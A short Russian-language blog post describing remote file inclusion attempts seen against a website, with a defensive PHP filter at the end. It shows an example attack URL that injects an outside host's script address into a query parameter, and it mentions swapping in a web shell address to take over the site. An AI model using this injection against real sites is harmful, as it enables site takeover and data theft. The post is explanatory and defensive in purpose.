Remote code execution - выполнение удаленного кода в контексте вашего сайта, довольно неприятная штука. Если в скриптах сайта находится подобная лазейка, можете с ним попрощаться фактически - никто не запретит хакеру сделать всё что угодно, от доступа к приватным данным типа базы пользователей до физического удаления всех файлов.

Столкнулся недавно с попыткой найти уязвимость данного типа на одном из сайтов. Выглядит очень просто - вместо стандартных параметров в адресную строку пытаются вставить некоторый адрес. К примеру ссылку

http://www.liveinternet.ru/im.php?_userid=971

можно попробовать несколько изменить и посмотреть что будет, вот так:

http://www.liveinternet.ru/im.php?_userid=http://sixbillion.org/3/guj/egoqivi/

По адресу http://sixbillion.org/3/guj/egoqivi/ сейчас лежит довольно простенький скрипт, содержащий в себе строку

<?php echo md5("just_a_test");?>

Атака будет считаться успешной, если скрипт выполнится и в полученную страницу будет вставлен результат его работы - пока просто строчка из 32 символов. Следующим шагом достаточно в тот же самый уязвимый параметр подставить адрес шелла (программы, для управления сайтом) и сайтик ваш.

Нашел уже около сотни взломанных сайтов, которые могут использоваться для нахождения уязвимостей. В серверных логах каждый подобный запрос идет с уникального адреса, так что банить по IP практически бесполезно. Единственный выход - максимальная фильтрация вводимых пользователем данных и отсеивание тех, которые содержат в себе адреса

foreach ($_GET as $key => $param) 
{
   if (preg_match("/http/i", strval($param))) die("Error"); 
}